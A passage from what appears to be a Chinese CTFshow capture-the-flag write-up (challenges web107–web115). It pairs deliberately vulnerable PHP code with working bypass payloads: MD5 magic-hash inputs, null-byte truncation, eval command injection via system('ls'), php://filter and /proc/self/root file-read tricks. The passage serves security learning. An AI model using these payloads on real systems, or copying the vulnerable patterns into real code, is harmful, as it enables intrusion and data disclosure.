class="variable">$flag</span>;</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.parse-str.php">parse_str函数</a></p>
<p>第二个参数：可选。规定存储变量的数组名称。该参数指示变量存储到数组中。</p>
<p>利用md5碰撞：使得v1中的flag=0，然后v3=0(md5(QNKCDZO)=0e…)，以0e开头的会被科学计数法认为0</p>
<p>payload：<code>vl=flag=0，v3=QNKCDZO</code></p>
<p>md5弱碰撞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">0e开头的md5和原值：</span><br><span class="line">QNKCDZO</span><br><span class="line">0e830400451993494058024219903391</span><br><span class="line">240610708</span><br><span class="line">0e462097431906509019562988736854</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1184209335a</span><br><span class="line">0e072485820392773389523109082030</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s532378020a</span><br><span class="line">0e220463095855511507588041205815</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="web108"><a href="#web108" class="headerlink" title="web108"></a>web108</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (ereg (<span class="string">&quot;^[a-zA-Z]+$&quot;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>])===<span class="literal">FALSE</span>)  &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;error&#x27;</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//只有36d的人才能看到flag</span></span><br><span class="line"><span class="keyword">if</span>(intval(strrev(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))==<span class="number">0x36d</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="built_in">error</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.strrev.php">strrev函数</a></p>
<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.intval.php">intval函数</a></p>
<p>ereg函数存在NULL截断漏洞，导致了正则过滤被绕过,所以可以使用%00截断正则匹配</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_25987491/article/details/79952393">php中ereg函数的截断漏洞</a></p>
<p>0x36d=877，因为会被反转所以需要778来提前反转，同时需要截断处理，所以<code>c=d%00778</code>经过反转后取整就是877</p>
<h1 id="web109"><a href="#web109" class="headerlink" title="web109"></a>web109</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-zA-Z]+/&#x27;</span>, <span class="variable">$v1</span>) &amp;&amp; preg_match(<span class="string">&#x27;/[a-zA-Z]+/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="string">&quot;echo new <span class="subst">$v1</span>(<span class="subst">$v2</span>());&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP异常处理 、嵌套执行</span><br><span class="line">通过异常处理类Exception(system(‘cmd’))可以运行指定代码，并且能返回运行的结果（如果存在返回）</span><br><span class="line">只要是变量后面紧跟着（），那么对这个变量进行函数调用。例如$a = &#x27;phpinfo&#x27;; $a(）即调用phpinfo（）</span><br></pre></td></tr></table></figure>

<p>因为只要有字母就行，所以利用PHP已有的类闭合一下(预防意外的报错导致程序无法正常执行)，然后构造命令执行即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?v1=Exception();system(&quot;ls&quot;);//&amp;v2=a</span><br><span class="line">?v1=ReflectionClass&amp;v2=system(&quot;ls&quot;)</span><br><span class="line">?v1=ReflectionClass(&quot;PDO&quot;);system(&quot;ls&quot;);//&amp;v2=a</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="http://blog.uiste.com/2015/20151018-1.html">反射 | PDO</a></p>
<h1 id="web110"><a href="#web110" class="headerlink" title="web110"></a>web110</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~|\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]/&#x27;</span>, <span class="variable">$v1</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~|\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&quot;echo new <span class="subst">$v1</span>(<span class="subst">$v2</span>());&quot;</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>FilesystemIterator获取目录文件<a target="_blank" rel="noopener" href="http://phpff.com/filesystemiterator">FilesystemIterator</a></p>
<p>getcwd()函数取得当前工作目录<a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-directory-getcwd.html">getcwd()函数</a></p>
<p>构造playload：</p>
<p><code>v1=FilesystemIterator&amp;v2=getcwd</code></p>
<p>得到当前目录的第一个文件名字：fl36dga.txt，然后访问即可，缺陷是如果flag的文件不在第一位的话，就不能得到这个文件名。因为FilesystemIterator一次只会得到一个文件名。</p>
<h1 id="web111"><a href="#web111" class="headerlink" title="web111"></a>web111</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">     </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params">&amp;<span class="variable">$v1</span>,&amp;<span class="variable">$v2</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&quot;$<span class="subst">$v1</span> = &amp;$<span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">    var_dump(<span class="variable">$$v1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~| |\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]|\&lt;|\&gt;/&#x27;</span>, <span class="variable">$v1</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~| |\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]|\&lt;|\&gt;/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/ctfshow/&#x27;</span>, <span class="variable">$v1</span>))&#123;</span><br><span class="line">            getFlag(<span class="variable">$v1</span>,<span class="variable">$v2</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">php超全局变量$GLOBALS的使用</span><br><span class="line"></span><br><span class="line">GLOABALS 引用全局作用域中可用的全部变量，一个包含了全部变量的全局组合数组。变量的名字就是数组的键。</span><br><span class="line"></span><br><span class="line">PHP生命周期中，定义在函数体外部的所谓全局变量，函数内部是不能直接获得的。即外部变量，函数内部是无法访问的，除非给函数传参数</span><br><span class="line"></span><br><span class="line">例如：</span><br><span class="line"></span><br><span class="line">    $a=123;</span><br><span class="line">    $b=456;</span><br><span class="line">    var_dump($GLOBALS);</span><br><span class="line"></span><br><span class="line">返回内容较多就不一一列出了。我们只看最后两条，发现我们自行定义的变量会被输出</span><br><span class="line"></span><br><span class="line">  [&quot;a&quot;]=&gt;</span><br><span class="line"></span><br><span class="line">  int(123)</span><br><span class="line"></span><br><span class="line">  [&quot;b&quot;]=&gt;</span><br><span class="line"></span><br><span class="line">  int(456)</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>所以对于该题，只要把$GLOBALS赋值给v2，然后v2再赋值给v1,经过getFlag之后，eval($ctfshow=&amp;$GLOBALS;)，即将变量ctfshow指向变量GLOBALS的地址即两个等价，实现var_dump($ctfshow)=var_dump($GLOBALS)的操作，即可将全部变量输出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?v1=ctfshow&amp;v2=GLOBALS</span><br></pre></td></tr></table></figure>



<h1 id="web112"><a href="#web112" class="headerlink" title="web112"></a>web112</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\.\.\/|http|https|data|input|rot13|base64|string/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;hacker!&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(! is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">    highlight_file(filter(<span class="variable">$file</span>));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">is_file  判断给定文件名是否为一个正常的文件，filename为文件的路径。</span><br><span class="line">//is_file函数可以使用包装器伪协议来绕过，当is_file的参数为伪协议时，返回值为false</span><br><span class="line">//不影响file_get_contents highlight_file</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>我们的目的是不能让is_file检测出是文件，并且 highlight_file可以识别为文件。这时候可以利用php伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line">可以直接用不带任何过滤器的filter伪协议</span><br><span class="line">?file=php://filter/resource=flag.php</span><br><span class="line"> </span><br><span class="line">也可以用一些没有过滤掉的编码方式和转换方式</span><br><span class="line">?file=php://filter/read=convert.quoted-printable-encode/resource=flag.php</span><br><span class="line">?file=compress.zlib://flag.php</span><br><span class="line">?file=php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php</span><br><span class="line">?file=php://filter/read=convert.iconv.utf-8.utf-16le/resource=flag.php</span><br></pre></td></tr></table></figure>



<h1 id="web113"><a href="#web113" class="headerlink" title="web113"></a>web113</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/filter|\.\.\/|http|https|data|data|rot13|base64|string/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;hacker!&#x27;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(! is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">    highlight_file(filter(<span class="variable">$file</span>));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!&quot;</span>;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>方法1:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?file=compress.zlib:<span class="comment">//flag.php</span></span><br></pre></td></tr></table></figure>

<p>方法2:</p>
<p>知识点：</p>
<pre><code>在linux中/proc/self/root是指向根目录的，也就是如果在命令行中输入ls /proc/self/root，其实显示的内容是根目录下的内容。多次重复后绕过is_file。大佬的解释是:超过20次软连接后就可以绕过is_file

这里使用的是PHP最新版的小Trick，require_once包含的软链接层数较多时once 的 hash 匹配会直接失效造成重复包含（目录溢出）

php源码分析 require_once 绕过不能重复包含文件的限制
</code></pre>
<p>方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload:?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p</span><br><span class="line">roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro</span><br><span class="line">c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/</span><br><span class="line">self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se</span><br><span class="line">lf/root/proc/self/root/var/www/html/flag.php</span><br></pre></td></tr></table></figure>



<h1 id="web114"><a href="#web114" class="headerlink" title="web114"></a>web114</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;hacker!&#x27;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;师傅们居然tql都是非预期 哼！&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(! is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">    highlight_file(filter(<span class="variable">$file</span>));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!&quot;</span>;</span><br><span class="line">&#125; 师傅们居然tql都是非预期 哼！</span><br></pre></td></tr></table></figure>

<p><code> ?file=php://filter/resource=flag.php</code></p>
<h1 id="web115"><a href="#web115" class="headerlink" title="web115"></a>web115</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$num</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;0x&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;0&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;.&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;e&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;+&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$num</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$num</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(is_numeric(<span class="variable">$num</span>) <span class="keyword">and</span> <span class="variable">$num</span>!==<span class="string">&#x27;36&#x27;</span> <span class="keyword">and</span> trim(<span class="variable">$num</span>)!==<span 